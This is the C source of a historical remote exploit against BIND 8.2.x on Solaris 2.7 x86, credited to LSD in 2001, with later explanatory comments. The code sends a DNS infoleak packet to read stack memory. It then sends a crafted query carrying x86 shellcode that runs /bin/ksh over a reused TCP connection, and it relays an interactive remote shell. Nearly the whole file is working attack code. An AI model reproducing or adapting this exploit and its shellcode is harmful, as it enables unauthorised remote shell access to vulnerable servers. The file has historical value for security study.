#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <rpc/rpc.h>
#include <netdb.h>
#include <stdio.h>
#include <errno.h>
/* Fixed 23-byte DNS message that main() sends first over UDP. sizeof(msg)
 * is used as the send length, so this must stay a char array (a string
 * literal would add a terminating NUL and change sizeof).
 * Header: id 0xabcd, flags 0x0980 (QR=0, opcode 1 = inverse query, RD, RA),
 * QDCOUNT 0, ANCOUNT 1, NSCOUNT 0, ARCOUNT 0. The remaining bytes form one
 * answer RR (root name, type 1, class 1, TTL 0x20202020) whose declared
 * RDLENGTH 0x0261 is larger than the bytes actually present. main() prints
 * bytes 512.. of whatever the server replies with as a "stack dump". */
char msg[]={
0xab,0xcd,0x09,0x80,0x00,0x00,0x00,0x01,
0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,
0x01,0x20,0x20,0x20,0x20,0x02,0x61
};
/* Machine-code blob (x86, per the banner printed by main) stored as a C
 * string. main() copies it with strlen(), so it must not contain a 0x00
 * byte. Bytes 70 and 71 -- the "\x12\x34" placeholder below -- are
 * overwritten at run time with the local port of the TCP connection that
 * main() opens; the trailing "/bin/ksh" is the program path the code
 * references. The instruction stream itself cannot be verified from this
 * source file; treat the blob as opaque data. */
char asmcode[]=
"\x1b"
"\x90"
"\x33\xc0"
"\xeb\x09"
"\x5f"
"\x57"
"\x47"
"\xab"
"\x47"
"\xaa"
"\x5e"
"\xeb\x0e"
"\xe8\xf2\xff\xff\xff"
"\x9a\xff\xff\xff\xff"
"\x07\xff"
"\xc3"
"\x33"
"\x56"
"\x5f"
"\x83\xef\x7c"
"\x57"
"\x8d\x4f\x10"
"\xb0\x44"
"\xab"
"\xab"
"\x91"
"\xab"
"\x95"
"\x66\xb9\x91\x54"
"\x51"
"\x66\xb9\x01\x01"
"\x51"
"\x33\xc0"
"\xb0\x36"
"\xff\xd6"
"\x59"
"\x33\xdb"
"\x3b\xc3"
"\x75\x0a"
"\x66\xbb\x12\x34"
"\x66\x39\x5d\x02"
"\x74\x03"
"\xe2\xe6"
"\x37"
"\xb0\x09"
"\x50"
"\x51"
"\x91"
"\xb1\x03"
"\x49"
"\x89\x4c\x24\x08"
"\x41"
"\x33\xc0"
"\xb0\x3e"
"\xff\xd6"
"\xe2\xf2"
"\xeb\x13"
"\x33\xd2"
"\x58"
"\x8d\x78\x14"
"\x52"
"\x57"
"\x50"
"\xab"
"\x92"
"\xab"
"\x88\x42\x08"
"\xb0\x3b"
"\xff\xd6"
"\xe8\xe8\xff\xff\xff"
"/bin/ksh"
;
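/*
 * Byte-swap a 32-bit value on big-endian hosts; identity on little-endian
 * hosts (the probe reads the first byte of an int initialised to 1).
 *
 * The original shifted the signed argument directly: `(a&0xff)<<24` is
 * undefined for bytes >= 0x80 and `a>>24` is implementation-defined for
 * negative a. The swap is now done on an unsigned copy, which is fully
 * defined and yields the same bit pattern on every real compiler.
 *
 * a: value to convert.
 * Returns: a unchanged on little-endian hosts, its bytes reversed otherwise.
 */
int rev(int a){
int probe=1;
if(*(char*)&probe) return a;
unsigned int v=(unsigned int)a;
unsigned int swapped=((v>>24)&0xffu)
                    |(((v>>16)&0xffu)<<8)
                    |(((v>>8)&0xffu)<<16)
                    |((v&0xffu)<<24);
return (int)swapped;
}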
/*
 * Historical (2001) proof-of-concept driver. Flow as written: resolve the
 * target, open one UDP and one TCP connection to port 53, send the fixed
 * `msg` datagram over UDP and print part of the reply as a hex dump, then
 * build a second UDP datagram that embeds `asmcode` (with the local TCP
 * port patched in) and finally relay stdin/stdout over the TCP socket.
 *
 * Several libc calls (exit, getopt, memcpy, strlen, inet_addr, ioctl,
 * sleep, read, write, select) are used without the headers that declare
 * them; the file relies on pre-C99 implicit declarations and will not
 * build as-is under a modern compiler.
 *
 * argv[1]: target host (dotted quad or name); -s / -e select the mode.
 * Returns: never returns normally; every path ends in exit(). Failures
 * that set errno are reported through perror() at the `err` label.
 */
int main(int argc,char **argv){
char buffer[1024],*b;
int i,c,n,sck[2],fp,ptr6,jmp,cnt,ofs,flag=-1;
struct hostent *hp;
struct sockaddr_in adr;
printf("copyright LAST STAGE OF DELIRIUM feb 2001 poland //lsd-pl.net/\n");
printf("bind 8.2 8.2.1 8.2.2 8.2.2PX for solaris 2.7 x86\n\n");
if(argc<2){
printf("usage: %s address [-s][-e]\n",argv[0]);
printf(" -s send infoleek packet\n");
printf(" -e send exploit packet\n");
exit(-1);
}
/* getopt() runs over argv[1..] so the address argument is skipped. If both
 * flags are given, the last one seen wins. */
while((c=getopt(argc-1,&argv[1],"se"))!=-1){
switch(c){
case 's': flag=1;break;
case 'e': flag=2;
}
}
if(flag==-1) exit(-1);
/* Target: argv[1] as dotted quad, otherwise resolved with gethostbyname().
 * inet_addr() returning -1 (INADDR_NONE) also matches 255.255.255.255. */
adr.sin_family=AF_INET;
adr.sin_port=htons(53);
if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1) {
if((hp=gethostbyname(argv[1]))==NULL) {
errno=EADDRNOTAVAIL;goto err;
}
memcpy(&adr.sin_addr.s_addr,hp->h_addr,4);
}
/* sck[0]: UDP to port 53 (connect() only fixes the peer address);
 * sck[1]: TCP to port 53. socket() results are not checked; a -1 would
 * surface as a connect() failure. */
sck[0]=socket(AF_INET,SOCK_DGRAM,0);
sck[1]=socket(AF_INET,SOCK_STREAM,0);
if(connect(sck[0],(struct sockaddr*)&adr,sizeof(adr))<0) goto err;
if(connect(sck[1],(struct sockaddr*)&adr,sizeof(adr))<0) goto err;
/* Learn the local port of the TCP connection; `adr` is reused for the
 * result. `i` is an int passed where socklen_t* is expected. If
 * getsockname() fails, two raw STREAMS ioctls are tried instead (the
 * constants look like Solaris I_PUSH "sockmod" followed by TI_GETMYNAME,
 * which cannot be confirmed from this file). */
i=sizeof(struct sockaddr_in);
if(getsockname(sck[1],(struct sockaddr*)&adr,&i)==-1){
struct netbuf {unsigned int maxlen;unsigned int len;char *buf;};
struct netbuf nb;
ioctl(sck[1],(('S'<<8)|2),"sockmod");
nb.maxlen=0xffff;
nb.len=sizeof(struct sockaddr_in);;
nb.buf=(char*)&adr;
ioctl(sck[1],(('T'<<8)|144),&nb);
}
/* Patch the local TCP port, high byte first, into asmcode[70..71]. */
n=ntohs(adr.sin_port);
asmcode[1+1+26+1+39+2]=(unsigned char)((n>>8)&0xff);
asmcode[1+1+26+1+39+3]=(unsigned char)(n&0xff);
/* Send the fixed query and read one datagram. The hex dump covers
 * buffer[512..cnt). If the reply is shorter than 536 bytes the loop body
 * may not run, but the reads of buffer[532..535] below still happen on
 * uninitialised stack memory. */
if(write(sck[0],msg,sizeof(msg))==-1) goto err;
if((cnt=read(sck[0],buffer,sizeof(buffer)))==-1) goto err;
printf("stack dump:\n");
for(i=0;i<(cnt-512);i++){
printf("%s%02x ",(i&&(!(i%16)))?"\n":"",(unsigned char)buffer[512+i]);
}
printf("\n\n");
/* fp: 32-bit value read from reply offset 532 through a pointer cast
 * (alignment of buffer is not guaranteed). ofs and cnt size the filler
 * runs written below. */
fp=rev(*(unsigned int*)&buffer[532]);
ofs=0x0106-((fp-(fp&0xffffff00))&0xff);
cnt=163;
/* Signature check on reply bytes 534/535. Because the condition uses &&,
 * the message fires only when both bytes differ from 0x04/0x08; a single
 * matching byte is enough to continue. */
if((buffer[512+20+2]!=(char)0x04)&&(buffer[512+20+3]!=(char)0x08)){
printf("system does not seem to be a vulnerable solaris\n");exit(1);
}
if(flag==1){
printf("system seems to be running bind 8.2.x on a solaris\n");exit(-1);
}
if(cnt<(ofs+12)){
printf("frame ptr is too low to be successfully exploited\n");exit(-1);
}
jmp=rev(fp-583);
ptr6=rev((fp&0xffffff00)+8);
fp=rev(fp&0xffffff00);
printf("frame ptr=0x%08x adr=%08x ofs=%d ",rev(fp),rev(jmp),ofs);
printf("port=%04x connected! ",(unsigned short)n);fflush(stdout);
/* Assemble the second datagram in place over `buffer`: a 12-byte DNS
 * header (id 0xabcd, flags 0x0100, QDCOUNT 2, ARCOUNT 1), asmcode, a run
 * of length-1 labels, a type/class pair, more labels, the jmp/ptr6 words,
 * more labels, and a 9-byte trailer whose last type/class is 0x00fa/0xffff.
 * Each "i++,b++ ... *b++=0x01" loop stores 0x01 at every second byte and
 * skips the byte in between, so the skipped label bytes keep whatever the
 * earlier read() left in `buffer`. The total comes to roughly 510 bytes,
 * inside the 1024-byte buffer. */
b=buffer;
memcpy(b,"\xab\xcd\x01\x00\x00\x02\x00\x00\x00\x00\x00\x01",12);b+=12;
for(i=0;i<strlen(asmcode);i++) *b++=asmcode[i];
for(i=0;i<(120>>1);i++,b++) *b++=0x01;
memcpy(b,"\x00\x00\x01\x00\x01",5);b+=5;
for(i=0;i<((ofs+64)>>1);i++,b++) *b++=0x01;
*b++=12;
memcpy(b,&jmp,4);b+=4;
memcpy(b,"\x06\x00\x00\x00",4);b+=4;
memcpy(b,&ptr6,4);b+=4;
cnt-=ofs+12;
for(i=0;i<(cnt>>1);i++,b++) *b++=0x01;
memcpy(b,"\x00\x00\x01\x00\x01\x00\x00\xfa\xff",9);b+=9;
if(write(sck[0],buffer,b-buffer)==-1) goto err;
sleep(1);printf("sent!\n");
/* Interactive relay over the TCP socket: "/bin/uname -a\n" is written
 * first, then stdin is copied to the socket and the socket to stdout
 * until either read() returns <1. write() results are ignored. The
 * EWOULDBLOCK/EAGAIN branches can only matter if the descriptors were
 * non-blocking, and nothing here sets O_NONBLOCK. The inner `cnt` shadows
 * the outer one. */
write(sck[1],"/bin/uname -a\n",14);
while(1){
fd_set fds;
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sck[1],&fds);
if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){
int cnt;
char buf[1024];
if(FD_ISSET(0,&fds)){
if((cnt=read(0,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(sck[1],buf,cnt);
}
if(FD_ISSET(sck[1],&fds)){
if((cnt=read(sck[1],buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(1,buf,cnt);
}
}
}
exit(0);
/* Common failure exit: errno was set by the failing call (or explicitly
 * to EADDRNOTAVAIL above), so perror() reports it. */
err:
perror("error");exit(-1);
}